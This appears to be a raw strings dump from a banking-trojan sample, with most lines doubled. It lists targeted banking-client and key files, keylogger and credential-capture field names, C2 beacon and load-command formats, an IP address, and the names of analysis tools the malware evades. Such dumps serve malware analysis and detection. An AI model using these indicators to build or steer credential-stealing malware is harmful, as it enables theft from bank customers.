Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
EnumChildWindows
EnumChildWindows
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanExW
VkKeyScanExW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
6f6C6
6f6C6
8 8$8(8,8
8 8$8(8,8
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
Desk_%ux
Desk_%ux
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
.Prev
.Prev
.current
.current
HighMemoryEvent_x
HighMemoryEvent_x
Explorer.EXE_840_rwx_01F70000_00068000:
.text
.text
`.rdata
`.rdata
@.data
@.data
@.reloc
@.reloc
http
http
SSSh
SSSh
PASSu:8V
PASSu:8V
PASSu-8V
PASSu-8V
PSSSSSSSh
PSSSSSSSh
t%F;5
t%F;5
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.5.11
4.5.11
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.5.11&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
EnumChildWindows
EnumChildWindows
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanExW
VkKeyScanExW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
ADM!XP9!F9BE9A8A
ADM!XP9!F9BE9A8A
%WinDir%\apppatch\hwcmqr.exe
%WinDir%\apppatch\hwcmqr.exe
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
5`6C6Q6}6
5`6C6Q6}6
6f6C6
6f6C6
8 8$8(8,8
8 8$8(8,8
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
Desk_%ux
Desk_%ux
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
.Prev
.Prev
.current
.current
HighMemoryEvent_x
HighMemoryEvent_x